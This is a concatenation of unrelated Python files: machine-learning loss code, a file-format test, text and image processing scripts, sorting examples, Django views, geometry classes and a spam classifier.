#mu_support = mu_support.reshape(5,5,-1).mean(dim=0)
#logvar_support = logvar_support.reshape(5,5,-1).mean(dim=0)
KLD_support = -0.5 * torch.sum(1 + logvar_support - mu_support.pow(2) - logvar_support.exp())
KLD_query = -0.5 * torch.sum(1 + logvar_query - mu_query.pow(2) - logvar_query.exp())
#KLD = KLD_support + KLD_query
KLD = KLD_support/mu_support.shape[0] + KLD_query/mu_query.shape[0]
#print(MSE,CE,KLD)
# 0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)
return 0.1*KLD + CE, logits
|
"""
Tests of neo.rawio.axographrawio
"""
import unittest
from neo.rawio.axographrawio import AxographRawIO
from neo.test.rawiotest.common_rawio_test import BaseTestRawIO
class TestAxographRawIO(BaseTestRawIO, unittest.TestCase):
rawioclass = AxographRawIO
files_to_download = [
'AxoGraph_Graph_File', # version 1 file, provided with AxoGraph
'AxoGraph_Digitized_File', # version 2 file, provided with AxoGraph
'AxoGraph_X_File.axgx', # version 5 file, provided with AxoGraph
'File_axograph.axgd', # version 6 file
'episodic.axgd',
'events_and_epochs.axgx',
]
entities_to_test = files_to_download
if __name__ == "__main__":
unittest.main()
|
import sys, os, re
import xml.etree.ElementTree as ET
from functools import reduce
def cleanXML(filename, results_dir=""):
origf = open(filename)
temp = open("temp.txt", "w+")
tagf = open(results_dir + filename[filename.rindex('\\') + 1:len(filename) - 3] + "diff", "w+")
loc = 0
c = origf.read(1)
tag = 0
while c:
if c == "<":
tag += 1
tagf.write(c)
if (tag == 1): temp.write(' ')
elif c == '>':
tag -= 1
tagf.write(c)
temp.write(' ')
elif tag == 0:
temp.write(c)
else:
tagf.write(c)
while True:
try:
loc = origf.tell()
c = origf.read(1)
break
except UnicodeDecodeError:
print(loc + 1)
continue
origf.close()
temp.close()
tagf.close()
cleanf = open(results_dir + filename[filename.rindex('\\') + 1:len(filename) - 3] + "txt", "w+")
temp = open("temp.txt", "r")
for line in temp:
for word in line.split():
if word:
cleanf.write(word)
cleanf.write(" ")
cleanf.close()
temp.close()
os.remove("temp.txt")
def create_dict(s, filename):
f = open(filename)
for line in f:
for word in line.split():
s.add(word.lower())
f.close()
w = open("shaker_dictionary.txt", "w+")
for word in list(s):
w.write(word)
w.write("\n")
w.close()
def get_xml_names(filename):
tree = ET.parse(filename)
root = tree.getroot()
names = []
xml_traverse(root, names)
return names
def xml_traverse(root, names):
for elem in root:
if elem.attrib.get("TEIform") == "persName":
names.append(elem.attrib.get("reg"))
xml_traverse(elem, names)
def clean_text(filename):
l = []
with open(filename) as f:
for line in f.readlines():
word = ""
for c in line:
if ord('A') <= ord(c) and ord(c) <= ord('Z') or\
ord('a') <= ord(c) and ord(c) <= ord('z'):
word += c
elif word and word[-1] != ' ' and c in [' ', '\t', '\n', '\r', '.', ',', '-']:
print(c)
word += ' '
for w in word.split():
l.append(w.strip())
print(*sorted(list(set(l))), sep='\n')
def main():
if sys.argv[1] == "-d" and len(sys.argv) == 4:
print("Cleaning directory: " + sys.argv[2])
for filename in os.listdir(sys.argv[2]):
if filename.endswith(".xml"):
print("Cleaning file: " + filename)
cleanXML(str(os.path.join(sys.argv[2], filename)), sys.argv[3])
elif len(sys.argv) == 2:
filename = sys.argv[1]
print("Cleaning file: " + filename)
cleanXML(filename)
# f = open(sys.argv[1])
# print(*sorted(list(set([line.strip() for line in f]))), sep='\n')
# clean_text(sys.argv[1])
elif len(sys.argv) == 3 and sys.argv[1] == '-c':
s = set()
for filename in os.listdir(sys.argv[2]):
if filename.endswith(".txt"):
print("Processing: " + filename)
create_dict(s, str(os.path.join(sys.argv[2], filename)))
# print(*list(s), sep='\n')
elif len(sys.argv) == 3 and sys.argv[1] == '-n':
n = get_xml_names(sys.argv[2])
print(n)
elif len(sys.argv) == 3 and sys.argv[1] == "-nd":
names = []
for filename in os.listdir(sys.argv[2]):
if filename.endswith(".xml"):
# print("Gathering names from: " + filename)
names.extend(get_xml_names(str(os.path.join(sys.argv[2], filename))))
l = []
for ns in list(set(names)):
ns = str(ns)
if ';' in ns:
for n in ns.split(';'):
l.append(" ".join(n.split()))
elif "and" in ns:
for n in ns.split('and'):
l.append(" ".join(n.split()))
else:
l.append(" ".join(ns.split()))
l.remove("Editor")
print(*[str(n).strip() for n in l], sep='\n')
else:
print("Command Line args are invalid.")
if __name__ == "__main__":
main()
|
import requests
import json
def GET():
name=raw_input("Enter the name u want to search for: ")
uri= "http://localhost:8081/mainhand"
payload={"name":name}
r = requests.get(uri,payload)
print r.status_code
print r.text
def POST():
name=raw_input("Enter the name u want to insert: ")
uri= "http://localhost:8081/mainhand"
payload={"name":name}
r = requests.post(uri, data=json.dumps(payload))
print r.status_code
print r.text
def PUT():
uri="http://localhost:8081/mainhand"
r = requests.put(uri)
print r.status_code
print r.text
def DELETE():
name=raw_input("Enter the name u want to delete: ")
uri="http://localhost:8081/mainhand"
payload={"name":name}
r = requests.delete(uri, data=json.dumps(payload))
print r.status_code
print r.text
selectrequest = {
1:GET,
2:POST,
3:PUT,
4:DELETE}
print selectrequest
selection =-1
while(selection!=5):
selection=int(input("Enter the type of request\n 1. GET \n 2. POST \n 3. PUT \n 4. DELETE \n 5. QUIT \n"))
if (selection >= 0) and (selection <=4):
selectrequest[selection]()
|
import sys
import math
def PrintMat(x, transpose):
if transpose:
x = map(list,zip(*x))
s = str(x)
s = s.replace("[","{")
s = s.replace("]","}")
s = s.replace("}, ","}, \n")
print "float fakeMat[4][4] = "
print s + ";"
angle = float(sys.argv[1])
axis = sys.argv[2]
xTranslation = 0
yTranslation = 0
zTranslation = 0
if len(sys.argv) >= 6:
xTranslation = float(sys.argv[3])
yTranslation = float(sys.argv[4])
zTranslation = float(sys.argv[5])
transpose = False
if sys.argv[len(sys.argv)-1] == "transpose":
transpose = True
cosTheta = round(math.cos(angle*math.pi/180.0),4)
sinTheta = round(math.sin(angle*math.pi/180.0),4)
xRot = [
[ 1, 0, 0, xTranslation],
[ 0, cosTheta, -sinTheta, yTranslation],
[ 0, sinTheta, cosTheta, zTranslation],
[ 0, 0, 0, 1]];
yRot = [
[ cosTheta, 0, sinTheta, xTranslation],
[ 0, 1, 0, yTranslation],
[ -sinTheta, 0, cosTheta, zTranslation],
[ 0, 0, 0, 1]];
zRot = [
[ cosTheta, -sinTheta, 0, xTranslation],
[ sinTheta, cosTheta, 0, yTranslation],
[ 0, 0, 1, zTranslation],
[ 0, 0, 0, 1]];
if axis == "x":
PrintMat(xRot,transpose)
if axis == "y":
PrintMat(yRot,transpose)
if axis == "z":
PrintMat(zRot,transpose)
|
# Helper functions
import glob
import os
import numpy as np
import warnings
import autodisc as ad
from io import BytesIO
from PIL import Image
def create_colormap(colors, is_marker_w=True):
MARKER_COLORS_W = [0x5F,0x5F,0x5F,0x7F,0x7F,0x7F,0xFF,0xFF,0xFF]
MARKER_COLORS_B = [0x9F,0x9F,0x9F,0x7F,0x7F,0x7F,0x0F,0x0F,0x0F]
nval = 253
ncol = colors.shape[0]
colors = np.vstack((colors, np.array([[0,0,0]])))
v = np.repeat(range(nval), 3) # [0 0 0 1 1 1 ... 252 252 252]
i = np.array(list(range(3)) * nval) # [0 1 2 0 1 2 ... 0 1 2]
k = v / (nval-1) * (ncol-1) # interpolate between 0 .. ncol-1
k1 = k.astype(int)
c1, c2 = colors[k1,i], colors[k1+1,i]
c = (k-k1) * (c2-c1) + c1 # interpolate between c1 .. c2
return np.rint(c / 8 * 255).astype(int).tolist() + (MARKER_COLORS_W if is_marker_w else MARKER_COLORS_B)
def transform_image_from_colormap(image, colormap):
'''
Function that transforms the color palette of a PIL image
input:
- image: the PIL image to transform
- colormap: the desired colormap
output: the transformed PIL image
'''
image_array = np.array(image)
image_array = np.uint8(image_array.astype(float)/255.0 * 252.0)
transformed_image = Image.fromarray(image_array)
transformed_image.putpalette(colormap)
return transformed_image
def transform_image_PIL_to_bytes(image, image_format = 'png'):
'''
Function that transforms a PIL image to bytes format
input:
- image: the PIL image to transform
- image_format: the image format
output: the image bytes
'''
with BytesIO() as output:
image.save(output, image_format)
image_bytes = output.getvalue()
return image_bytes
def load_statistics(experiment_directory):
statistics = dict()
if not os.path.isdir(experiment_directory):
raise ValueError('Directory {!r} does not exist!'.format(experiment_directory))
for file in glob.glob(os.path.join(experiment_directory, 'statistics', '*.npy')):
stat_name = os.path.splitext(os.path.basename(file))[0]
stat_val = np.load(file)
if len(stat_val.shape) == 0:
stat_val = stat_val.dtype.type(stat_val)
statistics[stat_name] = stat_val
for file in glob.glob(os.path.join(experiment_directory, 'statistics', '*.npz')):
stat_name = os.path.splitext(os.path.basename(file))[0]
stat_vals = dict(np.load(file))
# numpy encapsulates scalars as darrays with an empty shape
# recover the original type
for substat_name, substat_val in stat_vals.items():
if len(substat_val.shape) == 0:
stat_vals[substat_name] = substat_val.dtype.type(substat_val)
statistics[stat_name] = stat_vals
return statistics
def get_repetition_ids(experiment_id, repetition_ids):
# repetition_ids: Either scalar int with single id, list with several that are used for each experiment, or a dict with repetition ids per experiment.
# get the selected repetitions
cur_repetition_ids = repetition_ids
if repetition_ids is None or repetition_ids == 'all' or repetition_ids == ['all']:
# allows to index all repetitions, i.e. as using the operator ':'
cur_repetition_ids = slice(None)
else:
if isinstance(cur_repetition_ids, dict):
cur_repetition_ids = cur_repetition_ids[experiment_id]
if not isinstance(cur_repetition_ids, list):
cur_repetition_ids = [cur_repetition_ids]
return cur_repetition_ids
def get_experiment_data(data=None, experiment_id=None, data_source=None, repetition_ids=None, data_filter=None, data_filter_inds=None):
'''
The datasource is a tuple which allows to spcifiy sub sources.
Example: If "data[experimen_id] = dict(upperlevel=dict(lowerlevel=[1, 2, 3]))"
then "datasource = ('upperlevel', 'lowerlevel')" can retrieve the data.
A data_filter can be given according which the data gets filtered.
See filter_single_experiment_data for the format of the filter.
Otherwise boolen indeces can be given (data_filter_inds) to filter the data.
Please note that when indeces are used and only a subset of repetitoin_ids are defined, then the filter inds must only have
indeces for those repetitions and not all repetitions.
'''
if data_source is None:
data_source = []
elif not isinstance(data_source, tuple):
data_source = (data_source,)
cur_repetition_ids = get_repetition_ids(experiment_id, repetition_ids)
rep_data = data[experiment_id]
# go through data to get to final datasource
for data_source_elem in data_source:
if isinstance(data_source_elem, str) and isinstance(rep_data, np.ndarray) and data_source_elem[0] == '[' and data_source_elem[-1] == ']':
rep_data = eval('rep_data[:,:,' + data_source_elem[1:-1] + ']')
else:
rep_data = rep_data[data_source_elem]
if not isinstance(cur_repetition_ids, slice) and np.max(cur_repetition_ids) >= rep_data.shape[0]:
warnings.warn('Experiment {!r} does not have all requested repetitions. Only the exisiting ones are loaded.'.format(experiment_id))
cur_repetition_ids = [id for id in cur_repetition_ids if id < rep_data.shape[0]]
if np.ndim(rep_data) == 1:
rep_data = rep_data[cur_repetition_ids]
else:
rep_data = rep_data[cur_repetition_ids, :]
if data_filter_inds is None and data_filter is not None and data_filter:
# filter data according data_filter the given filter
data_filter_inds = filter_single_experiment_data(rep_data, data_filter)
# if there is a filter, apply it for each data individually
if data_filter_inds is not None:
rep_data = [rep_data[rep_idx, data_filter_inds[rep_idx]] for rep_idx in range(rep_data.shape[0])]
return rep_data
def get_datasource_data(data=None, experiment_ids=None, data_source=None, repetition_ids=None):
datasource_data = []
if data is not None:
# load data
if experiment_ids is None:
experiment_ids = ['all']
elif not isinstance(experiment_ids, list):
experiment_ids = [experiment_ids]
if experiment_ids == ['all']:
experiment_ids = list(data.keys())
# handle data source --> make to list if not list
if data_source is None:
data_source = [None]
elif data_source is not None and not isinstance(data_source, list):
data_source = [data_source]
for cur_data_source in data_source:
cur_data_source_data = []
for experiment_id in experiment_ids:
cur_data_source_data.append(get_experiment_data(data=data,
experiment_id=experiment_id,
data_source=cur_data_source,
repetition_ids=repetition_ids))
datasource_data.append(cur_data_source_data)
return datasource_data, experiment_ids
def transform_color_str_to_tuple(colors):
is_input_list = isinstance(colors, list)
if not is_input_list:
colors = [colors]
out_color = []
for color in colors:
col_elements = color.replace('(', ',').replace(')', ',').split(',')
out_color.append((col_elements[0], int(col_elements[1]), int(col_elements[2]), int(col_elements[3])))
if is_input_list:
return out_color
else:
return out_color[0]
def transform_color_tuple_to_str(colors):
is_input_list = isinstance(colors, list)
if not is_input_list:
colors = [colors]
out_color = ['{}({}, {}, {})'.format(color[0], color[1], color[2], color[3]) for color in colors]
if is_input_list:
return out_color
else:
return out_color[0]
def replace_str_from_dict(string, dictionary):
out_string = string
for key_name, new_str in dictionary.items():
new_formated_str = '{}'.format(new_str)
out_string = out_string.replace('<' + key_name + '>', new_formated_str)
return out_string
def filter_single_experiment_data(data, filter, repetition_id=None):
if isinstance(filter, tuple):
if len(filter) == 3:
bool_component_1 = filter_single_experiment_data(data, filter[0], repetition_id)
bool_component_2 = filter_single_experiment_data(data, filter[2], repetition_id)
if filter[1] == 'and':
ret_val = bool_component_1 & bool_component_2
elif filter[1] == 'or':
ret_val = bool_component_1 | bool_component_2
elif filter[1] == '<':
ret_val = bool_component_1 < bool_component_2
elif filter[1] == '<=':
ret_val = bool_component_1 <= bool_component_2
elif filter[1] == '>':
ret_val = bool_component_1 > bool_component_2
elif filter[1] == '>=':
ret_val = bool_component_1 >= bool_component_2
elif filter[1] == '==':
ret_val = bool_component_1 == bool_component_2
elif filter[1] == '!=':
ret_val = bool_component_1 != bool_component_2
elif filter[1] == '+':
ret_val = bool_component_1 + bool_component_2
elif filter[1] == '-':
ret_val = bool_component_1 - bool_component_2
elif filter[1] == '*':
ret_val = bool_component_1 * bool_component_2
elif filter[1] == '/':
ret_val = bool_component_1 / bool_component_2
elif filter[1] == '%':
ret_val = bool_component_1 % bool_component_2
else:
raise ValueError('Unknown operator {!r}!'.format(filter[1]))
elif len(filter) == 2:
val_component_1 = filter_single_experiment_data(data, filter[1], repetition_id)
if filter[0] == 'sum':
ret_val = np.sum(val_component_1)
elif filter[0] == 'cumsum':
ret_val = np.cumsum(val_component_1)
elif filter[0] == 'max':
ret_val = np.max(val_component_1)
elif filter[0] == 'min':
ret_val = np.min(val_component_1)
else:
raise ValueError('Unknown operator {!r}!'.format(filter[0]))
else:
raise ValueError('Unknown filter command {!r}!'.format(filter))
else:
if isinstance(filter, str):
try:
ret_val = ad.helper.misc.get_sub_dictionary_variable(data, filter)
if repetition_id is not None:
ret_val = ret_val[repetition_id]
except KeyError:
ret_val = filter
else:
ret_val = filter
return ret_val
def filter_experiments_data(experiments_data, filter, repetition_id=None):
filtered_data_inds = dict()
for experiment_id, experiment_data in experiments_data.items():
filtered_data_inds[experiment_id] = filter_single_experiment_data(experiment_data, filter, repetition_id=repetition_id)
return filtered_data_inds
|
def bubbleSort(arr):
n = len(arr)
for i in range(n):
for j in range(0, n-i-1):
if arr[j] > arr[j+1]:
arr[j], arr[j+1] = arr[j+1], arr[j]
# Driver code
if __name__ == "__main__":
arr = [12, 65, 23, 87, 55, 13, 18]
bubbleSort(arr)
print("Sorted array is:")
for i in range(len(arr)):
print("%d" % arr[i], end=" ")
|
"""Partial derivatives for cross-entropy loss."""
from math import sqrt
from torch import diag, diag_embed, einsum, multinomial, ones_like, softmax
from torch import sqrt as torchsqrt
from torch.nn.functional import one_hot
from backpack.core.derivatives.basederivatives import BaseLossDerivatives
class CrossEntropyLossDerivatives(BaseLossDerivatives):
"""Partial derivatives for cross-entropy loss.
The `torch.nn.CrossEntropyLoss` operation is a composition of softmax
and negative log-likelihood.
"""
def _sqrt_hessian(self, module, g_inp, g_out):
self._check_2nd_order_parameters(module)
probs = self._get_probs(module)
tau = torchsqrt(probs)
V_dim, C_dim = 0, 2
Id = diag_embed(ones_like(probs), dim1=V_dim, dim2=C_dim)
Id_tautau = Id - einsum("nv,nc->vnc", tau, tau)
sqrt_H = einsum("nc,vnc->vnc", tau, Id_tautau)
if module.reduction == "mean":
N = module.input0.shape[0]
sqrt_H /= sqrt(N)
return sqrt_H
def _sqrt_hessian_sampled(self, module, g_inp, g_out, mc_samples=1):
self._check_2nd_order_parameters(module)
M = mc_samples
C = module.input0.shape[1]
probs = self._get_probs(module)
V_dim = 0
probs_unsqueezed = probs.unsqueeze(V_dim).repeat(M, 1, 1)
multi = multinomial(probs, M, replacement=True)
classes = one_hot(multi, num_classes=C)
classes = einsum("nvc->vnc", classes).float()
sqrt_mc_h = (probs_unsqueezed - classes) / sqrt(M)
if module.reduction == "mean":
N = module.input0.shape[0]
sqrt_mc_h /= sqrt(N)
return sqrt_mc_h
def _sum_hessian(self, module, g_inp, g_out):
self._check_2nd_order_parameters(module)
probs = self._get_probs(module)
sum_H = diag(probs.sum(0)) - einsum("bi,bj->ij", (probs, probs))
if module.reduction == "mean":
N = module.input0.shape[0]
sum_H /= N
return sum_H
def _make_hessian_mat_prod(self, module, g_inp, g_out):
"""Multiplication of the input Hessian with a matrix."""
self._check_2nd_order_parameters(module)
probs = self._get_probs(module)
def hessian_mat_prod(mat):
Hmat = einsum("bi,cbi->cbi", (probs, mat)) - einsum(
"bi,bj,cbj->cbi", (probs, probs, mat)
)
if module.reduction == "mean":
N = module.input0.shape[0]
Hmat /= N
return Hmat
return hessian_mat_prod
def hessian_is_psd(self):
"""Return whether cross-entropy loss Hessian is positive semi-definite."""
return True
def _get_probs(self, module):
return softmax(module.input0, dim=1)
def _check_2nd_order_parameters(self, module):
"""Verify that the parameters are supported by 2nd-order quantities.
Attributes:
module (torch.nn.CrossEntropyLoss): Extended CrossEntropyLoss module
Raises:
NotImplementedError: If module's setting is not implemented.
"""
implemented_ignore_index = -100
implemented_weight = None
if module.ignore_index != implemented_ignore_index:
raise NotImplementedError(
"Only default ignore_index ({}) is implemented, got {}".format(
implemented_ignore_index, module.ignore_index
)
)
if module.weight != implemented_weight:
raise NotImplementedError(
"Only default weight ({}) is implemented, got {}".format(
implemented_weight, module.weight
)
)
|
"""Projection of conic sections (ellipses ... hyperbolae)
"""
from __future__ import print_function
import numpy as np
class Conic(object):
"""Bowshock shape - surface of revolution of a plane conic section
As the shape parameter `th_conic` is varied, this gives a sequence
from (`th_conic` = 45 - 90) oblate spheroid -> (`th_conic` = 45)
sphere -> (`th_conic` = 0 - 45) prolate spheroid -> (`th_conic` =
0) paraboloid -> (`th_conic` = -90 - 0) hyperboloid.
All the shapes are normalized so that the nose of the bow is at
unit distance from the bowshock source (star or proplyd), along
the x-axis. The radius of curvature on this axis is set by
another shape parameter, `A`
The parameter `t` is not an angle, but the angle can be found with
:method:`theta`
"""
tlimits_e = -np.pi, np.pi
tlimits_h = -5.0, 5.0
def __init__(self, A=1.0, th_conic=45.0):
# Hyperbolic or not?
self.hyper = th_conic < 0.0
self.sign = -1.0 if self.hyper else 1.0
self.parab = th_conic == 0.0 # special case: parabola
# Axis ratio
self.b_a = np.tan(np.radians(abs(th_conic)))
# Scaled radius of curvature: Rc/r0
self.A = A
def make_t_array(self, limits=None, N=2001):
"""Return an array of `N` equal-spaced t-parameter values between `limits`"""
if limits is None:
limits = self.tlimits_h if self.hyper or self.parab else self.tlimits_e
return np.linspace(limits[0], limits[1], N)
def x(self, t):
"""Body-frame x-position wrt star"""
fac = 1.0 - np.cosh(t) if self.hyper else np.cos(t) - 1.0
out = -0.5*self.A*t**2+1 if self.parab else 1.0 + self.A*fac/self.b_a**2
return out
def y(self, t):
"""Body-frame y-position wrt star"""
fac = np.sinh(t) if self.hyper else np.sin(t)
out = self.A*t if self.parab else self.A*fac/self.b_a
return out
def theta(self, t):
"""Body-frame angle from x-axis in degrees"""
return np.degrees(np.arctan2(self.y(t), self.x(t)))
def xt(self, inc, t):
"""Observer-frame x'-position of tangent line"""
fac1 = 1.0 - np.cosh(t) if self.hyper else np.cos(t) - 1.0
fac2 = np.cosh(t) if self.hyper else np.cos(t)
cosi = np.cos(np.radians(inc))
tani = np.tan(np.radians(inc))
if self.parab:
out = self.xtpar(self,inc,t)
else:
out = cosi*(1.0 + self.A*(fac1/self.b_a**2 + fac2*tani**2))
return out
def xtpar(self,inc,t):
"""Observer-frame x'-position of parabola tangent line"""
cosi = np.cos(np.radians(inc))
sini = np.sin(np.radians(inc))
tani = np.tan(np.radians(inc))
fac = 0.5*self.A*t**2+1
return fac*cosi - self.A*sini*tani
def ytpar(self,inc,t):
"""Observer-frame y'-position of parabola tangent line"""
tani = np.tan(np.radians(inc))
return self.A*t*np.sqrt(1-(tani/t)**2)
def yt(self, inc, t):
"""Observer-frame y'-position of tangent line"""
st = np.sinh(t) if self.hyper else np.sin(t)
ct = np.cosh(t) if self.hyper else np.cos(t)
tani = np.tan(np.radians(inc))
if self.parab:
out = self.ytpar(self,inc,t)
else:
out = np.sign(t)*(self.A/self.b_a)*np.sqrt(st**2 - (self.b_a*tani*ct)**2)
return out
def theta_t(self, inc, t):
"""Observer-frame angle of tangent line from x'-axis in degrees"""
return np.degrees(np.arctan2(self.yt(inc, t), self.xt(inc, t)))
def tparallel(self, inc):
"""Minimum value of t on the tangent line as function of inclination
Corresponds to y'=0"""
at = np.arctanh if self.hyper else np.arctan
tani = np.tan(np.radians(inc))
if self.parab:
out = tani
else:
out = at(self.b_a*tani)
return out
def g(self, inc):
"""q'/q = (R_0'/D') / (R_0/D) """
return 1.0 + self.sign * self.A * (self.f(inc) - 1.0)/self.b_a**2
def f(self, inc):
return np.sqrt(1.0 + self.sign * self.b_a**2 * np.tan(np.radians(inc))**2)
def Aprime(self, inc):
return self.A/(np.cos(np.radians(inc))**2 * self.f(inc) * self.g(inc))
if __name__ == "__main__":
# TODO Test the mechanism by drawing some conics
print("Write some tests!")
|
# In views.py
#Requests ---> from pydub import AudioSegment
# The convertor voice recognition can work together with another convertor (audio convertor)
@login_required() # an user can only convert a file if is logged in
def fileupload(request): #upload file function plus call the convert program and generates the txt file
if request.method == 'POST':
form = FileInfoForm(request.POST, request.FILES)
if form.is_valid():
fileinfo = form.save(commit=False)
fileinfo.user = request.user
name, ext = os.path.splitext(request.FILES['audio_file'].name) #audio-text convertor
# import pdb
# pdb.set_trace()
if ext == '.mp3': # if clause that calls audio convertor
with tempfile.NamedTemporaryFile(delete=False) as tf: #audio-text convertor
tf.write(request.FILES['audio_file'].read()) #audio-text convertor
tf.seek(0) #audio convertor
sound = AudioSegment.from_mp3(tf.name)#audio convertor
# path = os.path.join(settings.MEDIA_ROOT, 'audios', '{}.wav'.format(name))
with tempfile.NamedTemporaryFile(delete=False) as wavfile: #audio text-convertor
sound.export(wavfile.name, format="wav")
fileinfo.audio_file = FileSystemStorage().save( #audio text-convertor
'audios/%s.wav' % splitext(basename(fileinfo.audio_file.name))[0], wavfile)
file = BytesIO(fileinfo.audio_file.read())
else:
file = BytesIO(request.FILES['audio_file'].read())
# getting the converted text
text_converted = convert_audio(file)
# saving the converted text in memory
with StringIO() as t:
t.write(text_converted)
# setting the text_file with the text in memory saved before
fileinfo.text_file = FileSystemStorage().save(
'texts/%s.txt' % splitext(basename(fileinfo.audio_file.name))[0], t)
fileinfo.text_data = text_converted
fileinfo.save()
return redirect(reverse('filelist'))
else:
form = FileInfoForm()
return render(request, 'polls/upload.html', {'form': form})
import datetime
@login_required()
def filedownload(request, pk): #gives the option to download the txt file
fileinfo = get_object_or_404(FileInfo, pk=pk, user=request.user)
response = HttpResponse(fileinfo.text_file.read(), content_type='application/text')
response['Content-Disposition'] = 'attachment; filename=' + basename(fileinfo.text_file.name)
return response
|
import os
JwtConfig = {
'key' : os.environ.get('JWT_KEY', 'mysecretkey')
}
|
# for python 3.5+, use math.inf for lower versions float("inf")
# If you dont want to use infinity as sentinel, then just find the largest element in the array and add one to it
def mSort(A):
if len(A) == 0:
return A
elif len(A) == 1:
return A
else:
m = (len(A)-1)//2
L = mSort(A[:m+1])
# print("Left",L)
R = mSort(A[m+1:])
# print("Right",R)
result = merge(L, R)
# print("Merged",result)
return result
def merge(L, R):
L.append(float("inf"))
R.append(float("inf"))
i = j = 0
result = []
while L[i] != float("inf") or R[j] != float("inf"):
if L[i] <= R [j]:
result.append(L[i])
i += 1
else:
result.append(R[j])
j += 1
return result |
from django.shortcuts import render
from django.urls import reverse_lazy
from django.views.generic import (View,TemplateView,
ListView,DetailView,
CreateView,UpdateView,
DeleteView)
from . import models
# Pretty simple right?
class IndexView(TemplateView):
# Just set this Class Object Attribute to the template page.
# template_name = 'app_name/site.html'
template_name = 'index.html'
# def get_context_data(self,**kwargs):
# context = super().get_context_data(**kwargs)
# context['injectme'] = "Basic Injection!"
# return context
class SchoolListView(ListView):
context_object_name='schools'
model = models.School
# school_list
class SchoolDetailView(DetailView):
print('inside detail view')
context_object_name='school_details'
model = models.School
template_name = 'basic_app/school_detail.html'
class SchoolDeleteView(DeleteView):
model=models.School
success_url= reverse_lazy("basic_app:list")
class SchoolCreateView(CreateView):
fields = ('name','principal','location')
model = models.School
class SchoolUpdateView(UpdateView):
fields = ('name','principal')
model=models.School
|
# coding: utf-8
# In[1]:
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import math
# In[2]:
def define_mask():
mask = [[1,1,1],[1,1,1],[1,1,1]]
for i in range(3):
for j in range(3):
print(mask[i][j], end=" ")
print()
return mask
# In[16]:
def my_erosion(img, mask):
m=img.shape[0]
n=img.shape[1]
img_2 = np.zeros((m,n))
for i in range(1,m-1):
for j in range(1,n-1):
x1= img[i-1,j-1] and mask[0][0]
x2= img[i-1,j] and mask[0][1]
x3= img[i-1,j+1] and mask[0][2]
x4= img[i,j-1] and mask[1][0]
x5= img[i,j] and mask[1][1]
x6= img[i,j+1] and mask[1][2]
x7= img[i+1,j-1] and mask[2][0]
x8= img[i+1,j] and mask[2][1]
x9= img[i+1,j+1] and mask[2][2]
result = x1 and x2 and x3 and x4 and x5 and x6 and x7 and x8 and x9
img_2[i,j]=result
return img_2
# In[17]:
mask = define_mask()
# In[18]:
def get_distance(v,w=[1/3,1/3,1/3]):
a,b,c= v[0],v[1],v[2]
w1,w2,w3=w[0],w[1],w[2]
d=((a**2)*w[0] + (b**2)*w[1] +(c**2)*w[2])**.5
return d
# In[19]:
def convert_rgb_to_gray_level(img):
m=img.shape[0]
n=img.shape[1]
img_2=np.zeros((m,n))
for i in range(m):
for j in range(n):
img_2[i,j]=get_distance(img[i,j,:])
return img_2
# In[20]:
def convert_gray_level_to_BW(img):
m=img.shape[0]
n=img.shape[1]
img_bw=np.zeros((m,n))
for i in range(m):
for j in range(n):
if img[i,j] > 120:
img_bw[i,j]=1
else:
img_bw[i,j]=0
return img_bw
# In[21]:
img =mpimg.imread("turtle.jpg")
get_ipython().run_line_magic('matplotlib', 'inline')
img_2=convert_rgb_to_gray_level(img)
img_3=convert_gray_level_to_BW(img_2)
img_4 = my_erosion(img_3, define_mask())
img_5 = my_erosion(img_4, define_mask())
plt.imshow(img_3, cmap="gray"), plt.show()
plt.imshow(img_4, cmap="gray"), plt.show()
plt.imshow(img_5, cmap="gray"), plt.show()
|
import os
import re
import math
import sys
import copy
from fnmatch import fnmatch
pattern = "*.txt"
word_list = []
spam = 1
ham = 0
dict_spam = {}
dict_ham = {}
lw = []
pre = {}
listwords = {}
lrate = 0.5
iterations = 3
lambda_value = sys.argv[1]
cwd = os.getcwd()
with open('stopwords.txt') as f:
stop_words = f.read().splitlines()
def get_words(x,y):
for line in x:
for word in line.split():
word = word.lower()
y += filter(None,re.split(r'\W+|_', word))
def word_frequency(doc,list,ws):
temp_w = sorted(set(ws))
for i in temp_w:
count = 0
for j in ws:
if i == j:
count = count + 1
list.append(words(i,count))
def extractwords(dir,dict):
os.chdir(cwd)
global word_list
for path, subdirs, files in os.walk(dir):
os.chdir(dir)
for name in files:
words_obj = []
words = []
if fnmatch(name, pattern):
with open(name,'r') as file:
get_words(file,words)
if(sys.argv[2] == 'yes'):
filtered_word_list = words[:]
for word in words:
if word in stop_words:
filtered_word_list.remove(word)
words = filtered_word_list
word_frequency(file,words_obj,words)
word_list = word_list + words
dict[name] = words_obj
class Vocabulary(object):
def __init__(self, word, weight):
self.word = word
self.weight = weight
class words(object):
def __init__(self, word, count):
self.word = word
self.count = count
extractwords('train/spam',dict_spam)
extractwords('train/ham',dict_ham)
V = sorted(set(word_list))
print len(V)
def initialize_weights(V):
for i in V:
lw.append(Vocabulary(i,0))
listwords[i] = 0
initialize_weights(V)
def match(words):
for i in range(len(lw)):
if words == lw[i].word:
return lw[i].weight
return 0
def match_fn(word,ls):
for i in range(len(ls)):
if word == ls[i].word:
return ls[i].count
return 0
def predict(list):
sum = 1
for i in range(len(list)):
sum = sum + list[i].count * listwords[list[i].word]
if sum > 0:
return 1
else:
return 0
#calculates pr[i]
def prediction(dict,val):
for key in dict.keys():
ls = dict[key]
pr = predict(ls)
pre[key] = pr
def initialize_array():
d = {}
for i in V:
d[i] = 0
return d
def dw_calculation():
dw = initialize_array()
for i in dw.keys():
for j in dict_spam.keys():
ls = dict_spam[j]
frequency = match_fn(i,ls)
prev = dw[i]
dw[i] = prev + frequency * (spam - pre[j])
for j in dict_ham.keys():
ls = dict_ham[j]
frequency = match_fn(i,ls)
prev = dw[i]
dw[i] = prev + frequency * (ham - pre[j])
return dw
def update_weights(dw,ls):
for key in ls.keys():
val = ls[key] + float(lrate) * (float(dw[key]) - (float(lambda_value) * float(ls[key])))
ls[key] = val
for i in range(iterations):
prediction(dict_spam,spam)
prediction(dict_ham,ham)
dweights = dw_calculation()
update_weights(dweights,listwords)
def classify(list):
sum = 0
for i in range(len(list)):
if list[i].word in listwords:
sum += list[i].count * listwords[list[i].word]
if sum > 0:
return 1
else:
return 0
def apply_p_helper(dict,exp):
global count
for key in dict.keys():
ls = dict[key]
prediction = classify(ls)
if prediction == exp:
count = count + 1
count = 0
def apply_p():
print "applying...."
test_spam = {}
test_ham = {}
os.chdir(cwd)
extractwords('test/spam',test_spam)
extractwords('test/ham',test_ham)
